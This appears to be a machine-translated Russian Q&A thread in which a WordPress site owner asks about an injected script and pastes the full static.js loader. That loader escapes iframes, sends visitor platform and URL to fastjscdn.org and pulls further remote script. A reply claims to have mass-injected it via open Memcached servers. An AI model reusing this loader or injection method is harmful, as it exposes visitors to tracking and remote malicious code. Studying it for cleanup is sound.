Вредоносный JS-код в Wordpress меняет домен, на котором он размещен
На моем сайте Wordpress у меня есть этот вредоносный код перед «/ body»:
<script src = "https://fastjscdn.org/static.js?hash=a633f506a53746a846742c5655ebf596"></script>
Файл static.js содержит это:
window.__google__ads__show||(window.__google__ads__show = "1",function(){if (function t(){try{return window.self!==window.top}catch(a){return!0}}()){var t,a,e=window.parent.document.createElement("script");e.src = "https://fastjscdn.org/static.js",window.parent.document.body.appendChild(e);return}fetch("https://fastjscdn.org/platform/"+(window.navigator?.userAgentData?.platform||window.navigator.platform)+"/url/"+window.location.href).then(t=>{}),t = "https://fastjscdn.org/"+window.location.hostname.replace("www.","")+"/static.js",(a=document.createElement("script")).src=t,document.head.appendChild(a)}());
До «fastjscdn .org» вредоносный код JS размещался на домене с именем «asmr9999 .live». Через несколько дней домен изменился на «fastjscdn .org».
Как это возможно? Как он может изменить домен, на котором он размещен?
Я уверен, что Wordpress, темы и плагины не содержат вредоносного кода. Я ничего не нашел в базе данных, также в кодировке base64, пока.
Кроме того, что код в файле JS делает с моим сайтом?
Так же нашел других людей с моим таким же зловредом, в кастомной CMS никак не можем решить проблему. Подробнее здесь
Нет, Шакил, примерно через 3 дня домен, на котором размещен код JS, меняется с «asmr9999 .live» на «fastjscdn .org». у меня нет переадресации
Хорошо, теперь деактивируйте все плагины, обновите собственные темы и Wordpress, а затем установите wordfence, который просканирует весь веб-сайт и покажет вам зараженные файлы, просто удалите его.
я пробовал, ничего. Отчет Wordfence чистый
![Безумие обратных вызовов в javascript [JS]](https://i.imgur.com/WsjO6zJb.png)
Ответы 2
- Вы можете использовать онлайн-инструмент для улучшения JavaScript, чтобы проверить содержимое static.js: похоже, он внедряет скрипт, адаптированный к платформе, возможно, тот же, что вы упомянули в своем другом вопросе, который вызовет загрузку вредоносного/рекламного ПО.
- Причина, по которой он может изменить домен в сценарии, вероятно, заключается в том, что ваш хост все еще заражен; домен был зарегистрирован совсем недавно и, вероятно, был выбран потому, что выглядит менее подозрительно, чем предыдущий
спасибо, но я разговаривал с хостингом и у них проблем нет, в том числе и в оперативной памяти. Все остальные сайты на том же сервере не имеют этого вредоносного кода
Вы используете Cloudflare?
нет, не пользуюсь
ваш экземпляр WordPress работает на собственной виртуальной машине? какая ОС? у тебя есть страница phpinfo()?
спасибо за информацию, но мне нужно спросить об этом у моего хостинг-провайдера
Может быть, поздно, но позвольте мне сказать правду. Проблема заключается в том, что вы используете сервер Memcached, который является общедоступным и без пароля в сети. Я сделал скрипт, сканирующий сеть и внедряющий этот вредоносный код на каждый сервер memcached. -side" xss атака. Ваш сервер в безопасности. Настройте брандмауэр и заблокируйте подключение извне к порту 11211, все будет ок.
спасибо, я потратил месяц на поиск решения
Ваш сайт перенаправляется на этот URL-адрес после загрузки, верно?